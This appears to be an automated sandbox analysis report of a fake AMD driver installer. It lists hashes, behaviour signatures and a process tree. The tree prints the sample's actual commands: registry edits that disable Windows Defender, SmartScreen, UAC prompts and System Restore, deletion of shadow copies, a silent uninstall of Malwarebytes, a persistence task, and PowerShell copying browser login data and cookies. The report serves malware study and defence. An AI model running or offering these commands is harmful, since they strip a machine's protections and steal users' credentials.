Analysis
-
max time kernel
157s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
29-11-2022 16:15
General
-
Target
AMD-drivers-2.0.7.exe
-
Size
265.0MB
-
MD5
4d3bb85589bad628d92b79b17cf5e87e
-
SHA1
152d6b37b605255a3f7b71e416af6eed1682818a
-
SHA256
ca15402e6141c7ae941aeed7ff80933c814bce7ca007fb237b7b61c93f3bb338
-
SHA512
67b4fc2dcb3aeb1b355d9c34b3e46948c868a27db07cce534dd5fb4b2c376206b10bd21be016755b1e20efd51f9b903b3b11cdcc963df23e5d4692a2f8e6f94c
-
SSDEEP
393216:GKVaRkwboTiwguCPAGlEt883Zr1KCAKmvumolJ5j:dabbO2/DEesmCAKmv4j5j
Malware Config
Signatures
-
Modifies Windows Defender notification settings 3 TTPs 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Windows security bypass 2 TTPs 11 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 23 IoCs
-
Possible privilege escalation attempt 5 IoCs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 25 IoCs
-
Suspicious behavior: EnumeratesProcesses 50 IoCs
-
Suspicious use of AdjustPrivilegeToken 46 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmp"C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmp" /SL5="$200FE,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmp"C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmp" /SL5="$F01D6,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\.cmd""5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.exe /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.exe"C:\Windows\system32\reG.exe" Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exer.eXe /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F9⤵
- Windows security bypass
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmp" /SL5="$80204,9334883,121344,C:\tmp\obs64.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe" /verysilent /sp-7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4FOIQ.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FOIQ.tmp\obs64.tmp" /SL5="$90204,9334883,121344,C:\tmp\obs64.exe" /verysilent /sp-8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\tmp\obs64.scr"C:\tmp\obs64.scr"9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\tmp\obs64.sCr"C:\tmp\obs64.sCr"10⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\ch4l67dvuf1l0tdi240657531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\fb6n81tyukot2240657531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\3rpqamqf0xymy1h240657625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\yi3zl7f8gjuvn240657625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\ab0cu2189gt240657906.tmp\" -Force"11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\mz1sg9bmhkr240671875.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\xn8w0oix240671875.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\ogxsqz3ryg9u240671968.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ffcvww8md240671968.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\mn8oqmnyis4r6w240672250.tmp\" -Force"11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\inst.cmd""9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\de.cmd""5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\TMP\.CMD" "2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f3⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f3⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f3⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\smartscreen.exe" /a3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\smartscreen.exe" /reset3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\taskkill.exetaskkill /im smartscreen.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-183⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f3⤵
- Modifies Windows Defender notification settings
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exeschtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.execmd /c "C:\Program Files\malwarebytes\anti-malware\mbuns.exe" /uninstall /verysilent /f3⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\TMP\.CMDFilesize
28KB
MD543dbc0bf9164c0a548b45ddbb57ee50d
SHA1dc4287a77c8eae83c141c99efefb70acf698a8a4
SHA256b9d208b8aa071b76b1760bb69eee3151c75cd2779bcc94c9e77b67487dd5370c
SHA5129ef08c4795098d582eeeb92ec6b1f353a1d43d145ea222ee94eb3f695341f48b0481db000835fcd4b3209d90989109ffb755cd83e0d40c804052c27be6a6893a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
C:\Users\Admin\AppData\Local\Temp\3rpqamqf0xymy1h240657625.tmpFilesize
20KB
MD5055c8c5c47424f3c2e7a6fc2ee904032
SHA15952781d22cff35d94861fac25d89a39af6d0a87
SHA256531b3121bd59938df4933972344d936a67e75d8b1741807a8a51c898d185dd2a
SHA512c2772893695f49cb185add62c35284779b20d45adc01184f1912613fa8b2d70c8e785f0d7cfa3bfaf1d2d58e7cdc74f4304fd973a956601927719d6d370dd57a
-
C:\Users\Admin\AppData\Local\Temp\ab0cu2189gt240657906.tmpFilesize
6KB
MD5a5538caf2565d8c1e8ae8dce2b50e6cd
SHA17e7d30bc443a36ecc9033bdf5329ce9ee86783d9
SHA25695385104dfabee539b43c98ad10ab6c2c229f14e672dd91a3f645555086cfaf8
SHA5126afa57de6d03cdd924f32c0361787ad818bc1805875d656b8d396eeb7e402ff23e7562d38b2fc2f5889cb200ac17cf5f3f98c34e0503ef0b2f97fa20cb05682d
-
C:\Users\Admin\AppData\Local\Temp\ch4l67dvuf1l0tdi240657531.tmpFilesize
40KB
MD5b608d407fc15adea97c26936bc6f03f6
SHA1953e7420801c76393902c0d6bb56148947e41571
SHA256b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf
SHA512cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4
-
C:\Users\Admin\AppData\Local\Temp\de.cmdFilesize
156B
MD59972539e20656e7d427e7032a91e612b
SHA12316a78991e127b9ddfba4b88376c24e220ac57e
SHA256f64b2258031bbe5234e32a22ddf38ecefc6558c683cd60a2fa5bb20cd8e960e3
SHA512121f36b14ad6dfb065bc5626233ce1edcdbef732e729c0a1db03147c78937cbf771434a762077e6ac2274a6ad87bb2490c153042e39d75c62a97019540ee23dd
-
C:\Users\Admin\AppData\Local\Temp\fb6n81tyukot2240657531.tmpFilesize
88KB
MD58ee018331e95a610680a789192a9d362
SHA1e1fba0ac3f3d8689acf6c2ee26afdfd0c8e02df9
SHA25694354ea6703c5ef5fa052aeb1d29715587d80300858ebc063a61c02b7e6e9575
SHA5124b89b5adc77641e497eda7db62a48fee7b4b8dda83bff637cac850645d31deb93aafee5afeb41390e07fd16505a63f418b6cb153a1d35777c483e2d6d3f783b4
-
C:\Users\Admin\AppData\Local\Temp\inst.cmdFilesize
78B
MD5f361a90527b627fbd85f4a9084bbcabb
SHA11d39056c063d21f0809e787bf7b73ae2c49b2bb3
SHA256779b9c12c4b6c4b11bbca2fd23a3d027b9f12aac655ef0b77bca39da4c8ed173
SHA51249ccc44806472654eb7f0776d080e22f113162b1bd5827a5af701ebbd2b72608b40af7536a52199450aa21d68638535424c3d4e8028413a366df4f714b34bc24
-
C:\Users\Admin\AppData\Local\Temp\is-4FOIQ.tmp\obs64.tmpFilesize
1.1MB
MD534acc2bdb45a9c436181426828c4cb49
SHA15adaa1ac822e6128b8d4b59a54d19901880452ae
SHA2569c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07
SHA512134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb
-
C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\.cmdFilesize
1KB
MD5b46482b2d0cd42231e7430b7a7d48632
